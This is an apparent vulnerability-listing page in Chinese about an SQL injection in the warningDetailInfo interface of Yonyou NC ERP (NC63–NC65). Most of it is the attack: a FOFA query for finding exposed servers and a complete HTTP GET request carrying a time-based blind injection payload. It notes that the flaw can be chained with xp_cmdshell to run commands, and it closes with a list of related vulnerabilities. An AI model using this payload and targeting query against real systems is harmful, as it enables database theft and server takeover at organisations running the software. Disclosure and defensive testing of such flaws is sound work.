用友NC-warningDetailInfo接口存在SQL注入漏洞

日期: 2024-12-13 | 影响软件: 用友NC | POC: 已公开

漏洞描述

用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台,专为大中型企业提供企业管理解决方案。它集成了财务、供应链、生产、销售、采购、人力资源等多方面的功能，帮助企业实现数字化管理，提升运营效率。用友NC-warningDetailInfo接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。

PoC代码

## 用友NC-warningDetailInfo接口存在SQL注入漏洞



用友NC /ebvp/[infopub](https://cn-sec.com/archives/tag/infopub)/warningDetailInfo接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。



影响范围：NC63、NC633、NC65



## fofa



```

app="用友-UFIDA-NC"

```



## poc



```

GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1

Host: your-ip

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Accept: */*

Connection: keep-alive

```



![用友NC warningDetailInfo接口存在SQL注入漏洞](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251322607.png)

漏洞描述

PoC代码

相关漏洞推荐

用友NC IMsgCenterWebService 命令执行漏洞 无POC

用友nc soapRequest.ajax 命令执行漏洞 无POC

用友NC存在 PaWfm2/open SQL注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

用友NC IMsgCenterWebService 命令执行漏洞无POC

用友nc soapRequest.ajax 命令执行漏洞无POC

用友NC存在 PaWfm2/open SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC